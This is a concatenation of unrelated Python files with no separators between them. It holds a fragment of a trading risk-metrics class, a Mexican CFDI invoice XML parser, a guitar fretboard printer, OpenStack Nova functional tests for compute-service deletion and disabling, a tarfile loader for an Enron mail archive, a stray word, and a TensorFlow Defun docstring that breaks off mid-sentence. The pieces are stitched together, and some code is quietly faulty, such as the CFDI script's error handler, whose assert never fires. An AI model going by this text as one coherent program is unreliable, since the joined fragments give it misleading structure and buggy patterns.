        return np.std(daily_returns, ddof=1) * math.sqrt(self.num_trading_days)

    def calculate_sharpe(self):
        """
        http://en.wikipedia.org/wiki/Sharpe_ratio
        """
        return sharpe_ratio(self.algorithm_volatility,
                            self.algorithm_period_returns,
                            self.treasury_period_return)

    def calculate_sortino(self, mar=None):
        """
        http://en.wikipedia.org/wiki/Sortino_ratio
        """
        if mar is None:
            mar = self.treasury_period_return

        return sortino_ratio(self.algorithm_returns,
                             self.algorithm_period_returns,
                             mar)

    def calculate_information(self):
        """
        http://en.wikipedia.org/wiki/Information_ratio
        """
        return information_ratio(self.algorithm_returns,
                                 self.benchmark_returns)

    def calculate_beta(self):
        """

        .. math::

            \\beta_a = \\frac{\mathrm{Cov}(r_a,r_p)}{\mathrm{Var}(r_p)}

        http://en.wikipedia.org/wiki/Beta_(finance)
        """
        # it doesn't make much sense to calculate beta for less than two days,
        # so return none.
        if len(self.algorithm_returns) < 2:
            return 0.0, 0.0, 0.0, 0.0, []

        returns_matrix = np.vstack([self.algorithm_returns,
                                    self.benchmark_returns])
        C = np.cov(returns_matrix, ddof=1)
        eigen_values = la.eigvals(C)
        condition_number = max(eigen_values) / min(eigen_values)
        algorithm_covariance = C[0][1]
        benchmark_variance = C[1][1]
        beta = algorithm_covariance / benchmark_variance

        return (
            beta,
            algorithm_covariance,
            benchmark_variance,
            condition_number,
            eigen_values
        )

    def calculate_alpha(self):
        """
        http://en.wikipedia.org/wiki/Alpha_(investment)
        """
        return alpha(self.algorithm_period_returns,
                     self.treasury_period_return,
                     self.benchmark_period_returns,
                     self.beta)

    def calculate_max_drawdown(self):
        compounded_returns = []
        cur_return = 0.0
        for r in self.algorithm_returns:
            try:
                cur_return += math.log(1.0 + r)
            # this is a guard for a single day returning -100%
            except ValueError:
                log.debug("{cur} return, zeroing the returns".format(
                    cur=cur_return))
                cur_return = 0.0
                # BUG? Shouldn't this be set to log(1.0 + 0) ?
            compounded_returns.append(cur_return)

        cur_max = None
        max_drawdown = None
        for cur in compounded_returns:
            if cur_max is None or cur > cur_max:
                cur_max = cur

            drawdown = (cur - cur_max)
            if max_drawdown is None or drawdown < max_drawdown:
                max_drawdown = drawdown

        if max_drawdown is None:
            return 0.0

        return 1.0 - math.exp(max_drawdown)

#!/usr/bin/python
#-*-coding:utf8-*-

from bs4 import BeautifulSoup as Soup
#import pandas as pd
import glob
import sys
import re

"""
Version xml de cfdi 3.3
"""

class CFDI(object):
    def __init__(self, f):
        """
        Constructor que requiere en el parámetro una cadena con el nombre del
        cfdi.
        """
        fxml = open(f,'r').read()
        soup                 = Soup(fxml,'lxml')
        #============componentes del cfdi============
        emisor        = soup.find('cfdi:emisor')
        receptor      = soup.find('cfdi:receptor')
        comprobante   = soup.find('cfdi:comprobante')
        tfd           = soup.find('tfd:timbrefiscaldigital')
        self.__version        = comprobante['version']
        self.__folio          = comprobante['folio']
        self.__uuid           = tfd['uuid']
        self.__fechatimbrado  = tfd['fechatimbrado']
        self.__traslados      = soup.find_all(lambda e: e.name=='cfdi:traslado' and
                                                        sorted(e.attrs.keys())==['importe','impuesto','tasaocuota','tipofactor'])
        self.__retenciones    = soup.find_all(lambda e: e.name=='cfdi:retencion' and 
                                                        sorted(e.attrs.keys())==['importe','impuesto'])
        #============emisor==========================
        self.__emisorrfc      = emisor['rfc']
        try:
            self.__emisornombre   = emisor['nombre']
        except:
            self.__emisornombre   = emisor['rfc']
        #============receptor========================
        self.__receptorrfc    = receptor['rfc']
        try:
            self.__receptornombre = receptor['nombre']
        except:
            self.__receptornombre = receptor['rfc']
        #============comprobante=====================
        self.__certificado    = comprobante['certificado']
        self.__sello          = comprobante['sello']
        self.__total          = round(float(comprobante['total']),2)
        self.__subtotal       = round(float(comprobante['subtotal']),2)
        self.__fecha_cfdi     = comprobante['fecha']
        self.__conceptos      = soup.find_all(lambda e: e.name=='cfdi:concepto')
        self.__n_conceptos    = len(self.__conceptos)

        try:
            self.__moneda     = comprobante['moneda']
        except KeyError as k:
            self.__moneda     = 'MXN'

        try:
            self.__lugar      = comprobante['lugarexpedicion']
        except KeyError as k:
            self.__lugar      = u'México'
        tipo = comprobante['tipodecomprobante']

        if(float(self.__version)==3.2):
            self.__tipo       = tipo
        else:
            tcomprobantes = {'I':'Ingreso', 'E':'Egreso', 'N':'Nomina', 'P':'Pagado'}
            self.__tipo       = tcomprobantes[tipo]

        try:
            self.__tcambio    = float(comprobante['tipocambio'])
        except:
            self.__tcambio    = 1.

        triva, trieps, trisr  = self.__calcula_traslados()
        self.__triva          = round(triva,2)
        self.__trieps         = round(trieps,2)
        self.__trisr          = round(trisr,2)
        retiva, retisr        = self.__calcula_retenciones()
        self.__retiva         = round(retiva,2)
        self.__retisr         = round(retisr,2)

    def __str__(self):
        """
        Imprime el cfdi en el siguiente orden
        emisor, fecha de timbrado, tipo de comprobante, rfc emisor, uuid,_
        receptor, rfc receptor, subtotal, ieps, iva, retiva, retisr, tc, total
        """
        respuesta = '\t'.join( map(str, self.lista_valores))
        return respuesta

    def __calcula_traslados(self):
        triva, trieps, trisr = 0., 0., 0
        for t in self.__traslados:
            impuesto = t['impuesto']
            importe  = float(t['importe'])
            if(self.__version=='3.2'):
                if impuesto=='IVA':
                    triva += importe
                elif impuesto=='ISR':
                    trisr += importe
                elif impuesto=='IEPS':
                    trieps += importe
            elif(self.__version=='3.3'):
                if impuesto=='002':
                    triva += importe
                elif impuesto=='001':
                    trisr += importe
                elif impuesto=='003':
                    trieps += importe
        return triva, trieps, trisr

    def __calcula_retenciones(self):
        retiva, retisr = 0., 0.
        for t in self.__retenciones:
            impuesto = t['impuesto']
            importe  = float(t['importe'])
            if(self.__version=='3.2'):
                if(impuesto=='ISR'):
                    retisr += importe
                elif(impuesto=='IVA'):
                    retiva += importe
            elif(self.__version=='3.3'):
                if(impuesto=='002'):
                    retiva += importe
                elif(impuesto=='001'):
                    retisr += importe
         
        return retiva, retisr

    @property
    def lista_valores(self):
        v  = [self.__emisornombre,self.__fechatimbrado, self.__tipo, self.__emisorrfc ]
        v += [self.__uuid, self.__folio, self.__receptornombre, self.__receptorrfc ]
        v += [self.__subtotal, self.__trieps, self.__triva]
        v += [self.__retiva, self.__retisr, self.__tcambio, self.__total]
        return v

    @property
    def dic_cfdi(self):
        d = {}
        d["Emisor"]       = self.__emisornombre
        d["Fecha_CFDI"]   = self.__fechatimbrado
        d["Tipo"]         = self.__tipo
        d["RFC_Emisor"]   = self.__emisorrfc
        d["Folio_fiscal"] = self.__uuid
        d["Folio"]        = self.__folio
        d["Receptor"]     = self.__receptornombre
        d["RFC_Receptor"] = self.__receptorrfc
        d["Subtotal"]     = self.__subtotal
        d["IEPS"]         = self.__trieps
        d["IVA"]          = self.__triva
        d["Ret IVA"]      = self.__retiva
        d["Ret ISR"]      = self.__retisr
        d["TC"]           = self.__tcambio
        d["Total"]        = self.__total
        return d

    @property
    def certificado(self):
        return self.__certificado

    @property
    def sello(self):
        return self.__sello

    @property
    def total(self):
        return self.__total

    @property
    def subtotal(self):
        return self.__subtotal

    @property
    def fechatimbrado(self):
        return self.__fechatimbrado

    @property
    def tipodecambio(self):
        return self.__tcambio

    @property
    def lugar(self):
        return self.__lugar

    @property
    def moneda(self):
        return self.__moneda

    @property
    def traslado_iva(self):
        return self.__triva

    @property
    def traslado_isr(self):
        return self.__trisr

    @property
    def traslado_ieps(self):
        return self.__trieps

    @property
    def n_conceptos(self):
        return self.__n_conceptos

    @property
    def conceptos(self):
        return self.__conceptos

    @property
    def folio(self):
        return self.__folio

    @staticmethod
    def columnas():
        return ["Emisor","Fecha_CFDI","Tipo","RFC_Emisor","Folio_fiscal","Folio","Receptor",
                "RFC_Receptor", "Subtotal","IEPS","IVA","Ret IVA","Ret ISR","TC","Total"]

    @staticmethod
    def imprime_reporte(nf, nr):
        reporte  = "Número de archivos procesados:\t {}\n".format(nf)
        reporte += "Número de filas en tsv:\t {}\n".format(nr)
        if(nf!=nr):
            reporte += "\n\n**** Atención ****\n"

        return reporte



L = glob.glob('./*.xml')
#R = [ patt[1:].strip().lower() for patt in re.findall('(<cfdi:[A-z]*\s|<tfd:[A-z]*\s)',fxml)]


if __name__=='__main__':
    salida = sys.argv[1]
    fout   = open(salida,'w')
    columnas = CFDI.columnas()
    titulo   = '\t'.join(columnas)+'\n'
    fout.write(titulo)
    nl = 0
    for f in L:
        try:
            #print("abriendo {0}".format(f))
            rcfdi = CFDI(f)
            dic = rcfdi.dic_cfdi
            vals = [dic[c] for c in columnas]
            strvals = ' \t '.join(map(str, vals))+'\n'
            fout.write(strvals)
            nl += 1
        except:
            assert "Error en archivo {0}".format(f)
    fout.close()

    nr = len(L)
    rep = CFDI.imprime_reporte(nr, nl)
    print(rep)

#!/usr/bin/python3
from colorama import Fore, Back


class frets:
    tuning = list()
    max_string_name_len = 0;
    frets_count = 0;
    strings = dict()
    NOTES = ('E', 'F', 'F#', 'G', 'G#', 'A', 'A#', 'B', 'C', 'C#', 'D', 'D#')
    

    def __init__(self,
                 tuning=('E', 'A', 'D', 'G'), 
                 frets_count=24):
        self.tuning = tuning
        self.frets_count = frets_count
        
        for string in tuning:
            if len(string) > self.max_string_name_len:
                self.max_string_name_len = len(string)
        
            padding_count = 0;
            padding = ''
            
            self.strings[string] = list()
            
            starting_note = self.NOTES.index(string) + 1
            
            for i in range(frets_count):
                padding = '^' * int(((starting_note + i) / len(self.NOTES)))
                self.strings[string].append(self.NOTES[(starting_note + i) % len(self.NOTES)] + padding)
                #print('{}{} ({}) = {}'.format(string, 
                #                              i,
                #                              int(((starting_note + i) / len(self.NOTES))),
                #                              self.NOTES[(starting_note + i) % len(self.NOTES)] + padding))
    
    def debug_strings(self):
        print(self.strings)
    
    def show_me_plz(self,
                    seek_note=None,
                    seek_string=None):
        if (seek_string):
            seek_note = self.strings[seek_string[0]][int(seek_string[1]) - 1]
            
        upper_seek_note = None
        lower_seek_note = None
        if seek_note and seek_note.endswith('^'):
            lower_seek_note = seek_note[0:-1]
        if seek_note:
            upper_seek_note = seek_note + '^'
        
        upper_found_position = list()
        found_position = list()
        lower_found_position = list()
                    
        print(Fore.WHITE + \
              ' ' * (self.max_string_name_len + 2), 
              end='')
    
        for fret_nr in range(1, self.frets_count + 1):
            print(Fore.WHITE + \
                  (' ' * (4 - len(str(fret_nr)))) + str(fret_nr), 
                  end='')
            print(Fore.YELLOW + '|', end='')
        print('')
    
        for string in reversed(self.tuning):     
            color = Fore.WHITE + Back.BLACK       
            if string == seek_note:
                color = Fore.WHITE + Back.RED
                found_position.append(string + "0")
            elif string == upper_seek_note:
                color = Fore.WHITE + Back.CYAN
                upper_found_position.append(string + "0")
            elif string == lower_seek_note:
                color = Fore.WHITE + Back.MAGENTA
                lower_found_position.append(string + "0")
            
            print(color + \
                  (' ' * (self.max_string_name_len - len(string))) + \
                  string, end='')
            
            print(Fore.YELLOW + '||', end='')
            
            fret_nr = 1
            
            for note in self.strings[string]:
                color = Fore.WHITE + Back.BLACK
                if note == seek_note:
                    color = Fore.WHITE + Back.RED
                    found_position.append(string + str(fret_nr))
                elif note == upper_seek_note:
                    color = Fore.WHITE + Back.CYAN
                    upper_found_position.append(string + str(fret_nr))
                elif note == lower_seek_note:
                    color = Fore.WHITE + Back.MAGENTA
                    lower_found_position.append(string + str(fret_nr))
                          
                print(color + \
                      note[0:4] + \
                      '-' * (4 - len(note)), end='')
                print(Fore.YELLOW + Back.BLACK + '|', end='')
                
                fret_nr += 1
                
            print(Fore.WHITE + Back.BLACK + '')

        print(Fore.WHITE + '\n')
        
        print(Back.CYAN + ' ' + Back.BLACK + \
              ' Found octave-higher note {} on: {}'.format(upper_seek_note, 
                                                           upper_found_position))
        print(Back.RED + ' ' + Back.BLACK + \
              ' Found note {} on: {}'.format(seek_note, 
                                             found_position))
        print(Fore.WHITE + \
              Back.MAGENTA + ' ' + Back.BLACK + \
              ' Found octave-lower note {} on: {}'.format(lower_seek_note, 
                                                          lower_found_position))
                
            
        

# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

import os_resource_classes as orc
import os_traits
import six

from nova import context as nova_context
from nova import exception
from nova import objects
from nova.tests.functional.api import client as api_client
from nova.tests.functional import integrated_helpers
from nova import utils


class TestServicesAPI(integrated_helpers.ProviderUsageBaseTestCase):
    compute_driver = 'fake.SmallFakeDriver'

    def test_compute_service_delete_ensure_related_cleanup(self):
        """Tests deleting a compute service and the related cleanup associated
        with that like the compute_nodes table entry, removing the host
        from any aggregates, the host mapping in the API DB and the associated
        resource provider in Placement.
        """
        compute = self._start_compute('host1')
        # Make sure our compute host is represented as expected.
        services = self.admin_api.get_services(binary='nova-compute')
        self.assertEqual(1, len(services))
        service = services[0]

        # Now create a host aggregate and add our host to it.
        aggregate = self.admin_api.post_aggregate(
            {'aggregate': {'name': 'agg1'}})
        self.admin_api.add_host_to_aggregate(aggregate['id'], service['host'])
        # Make sure the host is in the aggregate.
        aggregate = self.admin_api.api_get(
            '/os-aggregates/%s' % aggregate['id']).body['aggregate']
        self.assertEqual([service['host']], aggregate['hosts'])

        rp_uuid = self._get_provider_uuid_by_host(service['host'])

        # We'll know there is a host mapping implicitly if os-hypervisors
        # returned something in _get_provider_uuid_by_host, but let's also
        # make sure the host mapping is there like we expect.
        ctxt = nova_context.get_admin_context()
        objects.HostMapping.get_by_host(ctxt, service['host'])

        # Make sure there is a resource provider for that compute node based
        # on the uuid.
        resp = self.placement_api.get('/resource_providers/%s' % rp_uuid)
        self.assertEqual(200, resp.status)

        # Make sure the resource provider has inventory.
        inventories = self._get_provider_inventory(rp_uuid)
        # Expect a minimal set of inventory for the fake virt driver.
        for resource_class in [orc.VCPU, orc.MEMORY_MB, orc.DISK_GB]:
            self.assertIn(resource_class, inventories)

        # Now create a server so that the resource provider has some allocation
        # records.
        flavor = self.api.get_flavors()[0]
        server = self._boot_and_check_allocations(flavor, service['host'])

        # Now the fun part, delete the compute service and make sure related
        # resources are cleaned up, like the compute node, host mapping, and
        # resource provider. We have to first stop the compute service so
        # it doesn't recreate the compute node during the
        # update_available_resource periodic task.
        self.admin_api.put_service(service['id'], {'forced_down': True})
        compute.stop()
        # The first attempt should fail since there is an instance on the
        # compute host.
        ex = self.assertRaises(api_client.OpenStackApiException,
                               self.admin_api.api_delete,
                               '/os-services/%s' % service['id'])
        self.assertIn('Unable to delete compute service that is hosting '
                      'instances.', six.text_type(ex))
        self.assertEqual(409, ex.response.status_code)

        # Now delete the instance and wait for it to be gone.
        self._delete_and_check_allocations(server)

        # Now we can delete the service.
        self.admin_api.api_delete('/os-services/%s' % service['id'])

        # Make sure the service is deleted.
        services = self.admin_api.get_services(binary='nova-compute')
        self.assertEqual(0, len(services))

        # Make sure the host was removed from the aggregate.
        aggregate = self.admin_api.api_get(
            '/os-aggregates/%s' % aggregate['id']).body['aggregate']
        self.assertEqual([], aggregate['hosts'])

        # Trying to get the hypervisor should result in a 404.
        self.admin_api.api_get(
            'os-hypervisors?hypervisor_hostname_pattern=%s' % service['host'],
            check_response_status=[404])

        # The host mapping should also be gone.
        self.assertRaises(exception.HostMappingNotFound,
                          objects.HostMapping.get_by_host,
                          ctxt, service['host'])

        # And finally, the resource provider should also be gone. The API
        # will perform a cascading delete of the resource provider inventory
        # and allocation information.
        resp = self.placement_api.get('/resource_providers/%s' % rp_uuid)
        self.assertEqual(404, resp.status)

    def test_evacuate_then_delete_compute_service(self):
        """Tests a scenario where a server is created on a host, the host
        goes down, the server is evacuated to another host, and then the
        source host compute service is deleted. After that the deleted
        compute service is restarted. Related placement resources are checked
        throughout.
        """
        # Create our source host that we will evacuate *from* later.
        host1 = self._start_compute('host1')
        # Create a server which will go on host1 since it is the only host.
        flavor = self.api.get_flavors()[0]
        server = self._boot_and_check_allocations(flavor, 'host1')
        # Get the compute service record for host1 so we can manage it.
        service = self.admin_api.get_services(
            binary='nova-compute', host='host1')[0]
        # Get the corresponding resource provider uuid for host1.
        rp_uuid = self._get_provider_uuid_by_host(service['host'])
        # Make sure there is a resource provider for that compute node based
        # on the uuid.
        resp = self.placement_api.get('/resource_providers/%s' % rp_uuid)
        self.assertEqual(200, resp.status)
        # Down the compute service for host1 so we can evacuate from it.
        self.admin_api.put_service(service['id'], {'forced_down': True})
        host1.stop()
        # Start another host and trigger the server evacuate to that host.
        self._start_compute('host2')
        self.admin_api.post_server_action(server['id'], {'evacuate': {}})
        # The host does not change until after the status is changed to ACTIVE
        # so wait for both parameters.
        self._wait_for_server_parameter(server, {
            'status': 'ACTIVE',
            'OS-EXT-SRV-ATTR:host': 'host2'})
        # Delete the compute service for host1 and check the related
        # placement resources for that host.
        self.admin_api.api_delete('/os-services/%s' % service['id'])
        # Make sure the service is gone.
        services = self.admin_api.get_services(
            binary='nova-compute', host='host1')
        self.assertEqual(0, len(services), services)
        # FIXME(mriedem): This is bug 1829479 where the compute service is
        # deleted but the resource provider is not because there are still
        # allocations against the provider from the evacuated server.
        resp = self.placement_api.get('/resource_providers/%s' % rp_uuid)
        self.assertEqual(200, resp.status)
        self.assertFlavorMatchesUsage(rp_uuid, flavor)
        # Try to restart the host1 compute service to create a new resource
        # provider.
        self.restart_compute_service(host1)
        # FIXME(mriedem): This is bug 1817833 where restarting the now-deleted
        # compute service attempts to create a new resource provider with a
        # new uuid but the same name which results in a conflict. The service
        # does not die, however, because _update_available_resource_for_node
        # catches and logs but does not re-raise the error.
        log_output = self.stdlog.logger.output
        self.assertIn('Error updating resources for node host1.', log_output)
        self.assertIn('Failed to create resource provider host1', log_output)

    def test_migrate_confirm_after_deleted_source_compute(self):
        """Tests a scenario where a server is cold migrated and while in
        VERIFY_RESIZE status the admin attempts to delete the source compute
        and then the user tries to confirm the resize.
        """
        # Start a compute service and create a server there.
        self._start_compute('host1')
        host1_rp_uuid = self._get_provider_uuid_by_host('host1')
        flavor = self.api.get_flavors()[0]
        server = self._boot_and_check_allocations(flavor, 'host1')
        # Start a second compute service so we can cold migrate there.
        self._start_compute('host2')
        host2_rp_uuid = self._get_provider_uuid_by_host('host2')
        # Cold migrate the server to host2.
        self._migrate_and_check_allocations(
            server, flavor, host1_rp_uuid, host2_rp_uuid)
        # Delete the source compute service.
        service = self.admin_api.get_services(
            binary='nova-compute', host='host1')[0]
        # We expect the delete request to fail with a 409 error because of the
        # instance in VERIFY_RESIZE status even though that instance is marked
        # as being on host2 now.
        ex = self.assertRaises(api_client.OpenStackApiException,
                               self.admin_api.api_delete,
                               '/os-services/%s' % service['id'])
        self.assertEqual(409, ex.response.status_code)
        self.assertIn('Unable to delete compute service that has in-progress '
                      'migrations', six.text_type(ex))
        self.assertIn('There are 1 in-progress migrations involving the host',
                      self.stdlog.logger.output)
        # The provider is still around because we did not delete the service.
        resp = self.placement_api.get('/resource_providers/%s' % host1_rp_uuid)
        self.assertEqual(200, resp.status)
        self.assertFlavorMatchesUsage(host1_rp_uuid, flavor)
        # Now try to confirm the migration.
        self._confirm_resize(server)
        # Delete the host1 service since the migration is confirmed and the
        # server is on host2.
        self.admin_api.api_delete('/os-services/%s' % service['id'])
        # The host1 resource provider should be gone.
        resp = self.placement_api.get('/resource_providers/%s' % host1_rp_uuid)
        self.assertEqual(404, resp.status)

    def test_resize_revert_after_deleted_source_compute(self):
        """Tests a scenario where a server is resized and while in
        VERIFY_RESIZE status the admin attempts to delete the source compute
        and then the user tries to revert the resize.
        """
        # Start a compute service and create a server there.
        self._start_compute('host1')
        host1_rp_uuid = self._get_provider_uuid_by_host('host1')
        flavors = self.api.get_flavors()
        flavor1 = flavors[0]
        flavor2 = flavors[1]
        server = self._boot_and_check_allocations(flavor1, 'host1')
        # Start a second compute service so we can resize there.
        self._start_compute('host2')
        host2_rp_uuid = self._get_provider_uuid_by_host('host2')
        # Resize the server to host2.
        self._resize_and_check_allocations(
            server, flavor1, flavor2, host1_rp_uuid, host2_rp_uuid)
        # Delete the source compute service.
        service = self.admin_api.get_services(
            binary='nova-compute', host='host1')[0]
        # We expect the delete request to fail with a 409 error because of the
        # instance in VERIFY_RESIZE status even though that instance is marked
        # as being on host2 now.
        ex = self.assertRaises(api_client.OpenStackApiException,
                               self.admin_api.api_delete,
                               '/os-services/%s' % service['id'])
        self.assertEqual(409, ex.response.status_code)
        self.assertIn('Unable to delete compute service that has in-progress '
                      'migrations', six.text_type(ex))
        self.assertIn('There are 1 in-progress migrations involving the host',
                      self.stdlog.logger.output)
        # The provider is still around because we did not delete the service.
        resp = self.placement_api.get('/resource_providers/%s' % host1_rp_uuid)
        self.assertEqual(200, resp.status)
        self.assertFlavorMatchesUsage(host1_rp_uuid, flavor1)
        # Now revert the resize.
        self._revert_resize(server)
        self.assertFlavorMatchesUsage(host1_rp_uuid, flavor1)
        zero_flavor = {'vcpus': 0, 'ram': 0, 'disk': 0, 'extra_specs': {}}
        self.assertFlavorMatchesUsage(host2_rp_uuid, zero_flavor)
        # Delete the host2 service since the migration is reverted and the
        # server is on host1 again.
        service2 = self.admin_api.get_services(
            binary='nova-compute', host='host2')[0]
        self.admin_api.api_delete('/os-services/%s' % service2['id'])
        # The host2 resource provider should be gone.
        resp = self.placement_api.get('/resource_providers/%s' % host2_rp_uuid)
        self.assertEqual(404, resp.status)


class ComputeStatusFilterTest(integrated_helpers.ProviderUsageBaseTestCase):
    """Tests the API, compute service and Placement interaction with the
    COMPUTE_STATUS_DISABLED trait when a compute service is enable/disabled.

    This version of the test uses the 2.latest microversion for testing the
    2.53+ behavior of the PUT /os-services/{service_id} API.
    """
    compute_driver = 'fake.SmallFakeDriver'

    def _update_service(self, service, disabled, forced_down=None):
        """Update the service using the 2.53 request schema.

        :param service: dict representing the service resource in the API
        :param disabled: True if the service should be disabled, False if the
            service should be enabled
        :param forced_down: Optionally change the forced_down value.
        """
        status = 'disabled' if disabled else 'enabled'
        req = {'status': status}
        if forced_down is not None:
            req['forced_down'] = forced_down
        self.admin_api.put_service(service['id'], req)

    def test_compute_status_filter(self):
        """Tests the compute_status_filter placement request filter"""
        # Start a compute service so a compute node and resource provider is
        # created.
        compute = self._start_compute('host1')
        # Get the UUID of the resource provider that was created.
        rp_uuid = self._get_provider_uuid_by_host('host1')
        # Get the service from the compute API.
        services = self.admin_api.get_services(binary='nova-compute',
                                               host='host1')
        self.assertEqual(1, len(services))
        service = services[0]

        # At this point, the service should be enabled and the
        # COMPUTE_STATUS_DISABLED trait should not be set on the
        # resource provider in placement.
        self.assertEqual('enabled', service['status'])
        rp_traits = self._get_provider_traits(rp_uuid)
        trait = os_traits.COMPUTE_STATUS_DISABLED
        self.assertNotIn(trait, rp_traits)

        # Now disable the compute service via the API.
        self._update_service(service, disabled=True)

        # The update to placement should be synchronous so check the provider
        # traits and COMPUTE_STATUS_DISABLED should be set.
        rp_traits = self._get_provider_traits(rp_uuid)
        self.assertIn(trait, rp_traits)

        # Try creating a server which should fail because nothing is available.
        networks = [{'port': self.neutron.port_1['id']}]
        server_req = self._build_server(networks=networks)
        server = self.api.post_server({'server': server_req})
        server = self._wait_for_state_change(server, 'ERROR')
        # There should be a NoValidHost fault recorded.
        self.assertIn('fault', server)
        self.assertIn('No valid host', server['fault']['message'])

        # Now enable the service and the trait should be gone.
        self._update_service(service, disabled=False)
        rp_traits = self._get_provider_traits(rp_uuid)
        self.assertNotIn(trait, rp_traits)

        # Try creating another server and it should be OK.
        server = self.api.post_server({'server': server_req})
        self._wait_for_state_change(server, 'ACTIVE')

        # Stop, force-down and disable the service so the API cannot call
        # the compute service to sync the trait.
        compute.stop()
        self._update_service(service, disabled=True, forced_down=True)
        # The API should have logged a message about the service being down.
        self.assertIn('Compute service on host host1 is down. The '
                      'COMPUTE_STATUS_DISABLED trait will be synchronized '
                      'when the service is restarted.',
                      self.stdlog.logger.output)
        # The trait should not be on the provider even though the node is
        # disabled.
        rp_traits = self._get_provider_traits(rp_uuid)
        self.assertNotIn(trait, rp_traits)
        # Restart the compute service which should sync and set the trait on
        # the provider in placement.
        self.restart_compute_service(compute)
        rp_traits = self._get_provider_traits(rp_uuid)
        self.assertIn(trait, rp_traits)


class ComputeStatusFilterTest211(ComputeStatusFilterTest):
    """Extends ComputeStatusFilterTest and uses the 2.11 API for the
    legacy os-services disable/enable/force-down API behavior
    """
    microversion = '2.11'

    def _update_service(self, service, disabled, forced_down=None):
        """Update the service using the 2.11 request schema.

        :param service: dict representing the service resource in the API
        :param disabled: True if the service should be disabled, False if the
            service should be enabled
        :param forced_down: Optionally change the forced_down value.
        """
        # Before 2.53 the service is uniquely identified by host and binary.
        body = {
            'host': service['host'],
            'binary': service['binary']
        }
        # Handle forced_down first if provided since the enable/disable
        # behavior in the API depends on it.
        if forced_down is not None:
            body['forced_down'] = forced_down
            self.admin_api.api_put('/os-services/force-down', body)

        if disabled:
            self.admin_api.api_put('/os-services/disable', body)
        else:
            self.admin_api.api_put('/os-services/enable', body)

    def _get_provider_uuid_by_host(self, host):
        # We have to temporarily mutate to 2.53 to get the hypervisor UUID.
        with utils.temporary_mutation(self.admin_api, microversion='2.53'):
            return super(ComputeStatusFilterTest211,
                         self)._get_provider_uuid_by_host(host)

#!/usr/bin/env python
# SIM-CITY client
#
# Copyright 2015 Netherlands eScience Center <info@esciencecenter.nl>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import tarfile


class load_data:

    '''
    class to load txt data
    '''

    def __init__(self, filename):
        self.filename = filename
        tfile, members = self.get_archive_object_tar()
        self.read_files(tfile, members)

    def get_archive_object_tar(self):
        '''
        return tarfile object and its members
        '''
        tfile = tarfile.open(name=self.filename)
        members = tfile.getnames()
        return tfile, members

    def read_files(self, tfile, members):
        '''
        array with txt data from tarfile object
        '''
        self.data = [tfile.extractfile(member).read() for member in members if
                     tfile.extractfile(member) is not None]


def main():
    load_data('enron_mail_clean.tar.gz')
    import pdb
    pdb.set_trace()


if __name__ == "__main__":
    main()

zhangyu

from .fetch import FetchParser
from .json_ld import JsonLdParser
from .lom import LomParser
from .lrmi import LrmiParser
from .nsdl_dc import NsdlDcParser

__all__ = [
    'FetchParser',
    'JsonLdParser',
    'LomParser',
    'LrmiParser',
    'NsdlDcParser',
]

# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
"""Python front-end supports for functions.

NOTE: functions are currently experimental and subject to change!
"""

from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

import collections
import hashlib

from tensorflow.core.framework import attr_value_pb2
from tensorflow.core.framework import function_pb2
from tensorflow.python import pywrap_tensorflow as c_api
from tensorflow.python.eager import context
from tensorflow.python.framework import c_api_util
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import graph_to_function_def
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variable_scope as vs
from tensorflow.python.util import compat
from tensorflow.python.util import function_utils
from tensorflow.python.util import tf_contextlib
from tensorflow.python.util import tf_inspect


class Defun(object):
  """Decorator used to define TensorFlow functions.

  Use this decorator to make a Python function usable directly as a TensorFlow
  function.

  The decorated function must add ops to the default graph and return zero or
  more `Tensor` objects.  Call the decorator with named arguments, one for each
  argument of the function to decorate, with the expected type of the argument
  as value.

  For example if the function to decorate accepts two `tf.float32` arguments
  named `x` and `y`, call the decorator with:

      @Defun(tf.float32, tf.float32)
      def foo(x, y):
        ...

  When you call the decorated function it will add `call` ops to the
  default graph and adds the definition of the function into the
  default graph. Because the addition of the function into the graph
  is deferred, the decorator can be used anywhere in the program.

  Any variables created inside of the function are hoisted into the outer graph.
  Note that the variables are created in the variable scope that was active
  during the first call to the function. Subsequent function calls will refer to
  the same set of variables.

  Definitions of functions in a graph are frozen as soon as the graph is used to
  create a session. However, new functions and new calls to existing functions
  may be added to the graph, with the new functions themselves becoming
  immediately frozen.

  Example, but also see the [How To on functions](link_needed).

  ```python
  # Defining the function.
  @tf.Defun(tf.float32, tf.float32)
  def MyFunc(x, y):
    return x + y, x - y

  # Building the graph.
  a = tf.constant([1.0])
  b = tf.constant([2.0])
  c, d = MyFunc(a, b, name='mycall')
  ```
  """

  def __init__(self, *input_types, **kwargs):
    """Create a `Defun` decorator.

    Args:
      *input_types: A list of `tf.DType`
      **kwargs: Optional keyword arguments, including
         func_name - (optional).  A python string, the name to use to
           declare this `Function` in the graph.

         grad_func - (optional).  A function implementing the gradient
           of the function-to-register.  This is must be a
           `_DefinedFunction` object. The gradient
           function must satisfy the criterion defined in
           function.proto:GradientDef.

         python_grad_func - (optional).  A function implementing the
           gradient of the function python-side. This function must
           take the current op and the gradients w.r.t. its outputs,
           and return the gradients w.r.t. the inputs. That is it must
           implement the interface expected by `tf.RegisterGradient`).
           This will be called by tf.gradients to add the gradient ops
           to the graph. At most one of grad_func and python_grad_func
